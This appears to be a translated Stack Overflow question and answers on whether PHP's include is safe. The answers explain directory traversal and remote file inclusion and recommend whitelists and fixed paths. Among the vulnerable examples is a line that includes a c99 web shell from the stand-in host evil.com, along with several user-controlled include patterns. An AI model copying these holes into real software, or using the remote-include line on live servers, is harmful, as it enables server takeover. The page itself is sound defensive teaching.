PHP - “包含”功能是否安全?

时间:2012-04-13 21:07:34

标签: php include

我正在使用“include”功能(e.x.“include'head2.php'”或“include'class.users.php'”) 在我的网站中添加标题或会话类。我真的不记得在哪里,但我听说黑客滥用,不知何故,这个“包含”的东西,发送虚假的包含页面或类似的东西。 所以基本上我想知道什么是“包含”功能,我该如何保护它,它们如何滥用它以及是否有更好的解决方案来满足我的需求。

提前致谢。

8 个答案:

答案 0 :(得分:15)

这一切都取决于你如何实现它。如果您专门设置路径,那么它是安全的。如果允许用户输入确定文件路径而不进行清理或检查,则可能发生攻击。

不安全(目录遍历)

<?php 
include($_GET['file']);
?>

不安全URL fopen - 如果已启用)

<?php 
include('http://evil.com/c99shell.php');
?>

<强>不安全 

<?php 
include('./some_dir/' . $_GET['file']);
?>

部分不安全(* .php文件易受攻击) 

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

安全(虽然不确定为什么有人会这样做。)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

<强>安全 

<?php 
include('./includes/somefile.php');
?>

答案 1 :(得分:3)

包含的最大问题可能是将文件扩展名从PHP更改为Web服务器无法自动执行的操作。例如library.inc或config.inc。使用Web浏览器调用这些文件将显示代码而不是执行它 - 并且将显示任何密码或可利用的提示。

将可能包含密码的 config.php config.inc 进行比较。在大多数情况下,提取config.inc会显示数据库密码是什么。

有些程序员对库使用.inc扩展名。前提是它们不在Web服务器可访问的目录中。但是,较少安全的偏执程序员可能会将该文件转储到方便的Web目录中。

否则,请确保您不以某种方式包含由查询字符串提交的文件。例如:include( $_GET['menu_file'] )&lt; - 这是非常错误的。

答案 2 :(得分:2)

如果您执行以下操作,可能会滥用包含:

include($_GET["page"]);

然后调用URL:

myscript.php?page=index.php

攻击者可以将index.php替换为hxxp://hackerz.ru/install_stuff.php,您的服务器很乐意运行它。

include本身非常安全。只需确保始终验证/转义您的输入。

答案 3 :(得分:2)

任何服务器端(假设您的服务器没有受到损害)都是安全的。这样做:

$var = $_GET['var']';    
include $var . ".php";

是不安全的。

include "page.php";

是安全的。

答案 4 :(得分:1)

如果您不这样做,则包含是安全的:

  1. 包含www.someoneelsesssite.com/something.php
    2. 等远程文件
  2. 包含来自客户端的路径中的文件。 www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
  3. 包含来自其他可能受污染的来源的文件,例如数据库。

    4. 2和3在技术上有一个警告,如果你不允许./或在\窗口,你可能会很好。但如果你不知道为什么,你就不太了解风险。即使您认为数据库是只读的或其他安全的,明智的做法是不要假设除非您真的必须这样做,这几乎从来没有。

    正如pp19dd的回答所指出的那样。使用.php扩展名命名包含也很重要。如果您已将apache(或您正在使用的任何Web服务器)设置为将另一种文件类型解析为PHP,那么这也是安全的。但如果您不确定,请专门使用.php。

答案 5 :(得分:1)

最好的办法是确保您尝试包含的页面首先存在。当您的包含页面是从某种用户输入(例如URL变量)处理时,会出现真正的安全漏洞。 ?include=page.php只要你对这些事情保持谨慎,你应该没事。

if(is_file($file)) {
    //other code, such as user verification and such should also go here
    include $file;
}
else { die(); }

答案 6 :(得分:0)

不! include()不安全。无需考虑任何一行代码,请考虑以下问题:即使文件加载失败,include()仍允许脚本顺应。它将继续运行并显示警告。因此,这为聪明的恶意用户扩大了php脚本的攻击媒介。

在现代应用程序设计中,为什么包含文件 ever 必须是可选的? 如果您的应用程序不完整,您希望它失败!

答案 7 :(得分:-1)

我正在使用这种方法。

<?php include (dirname(__FILE__).'/file.php');
相关问题
最新问题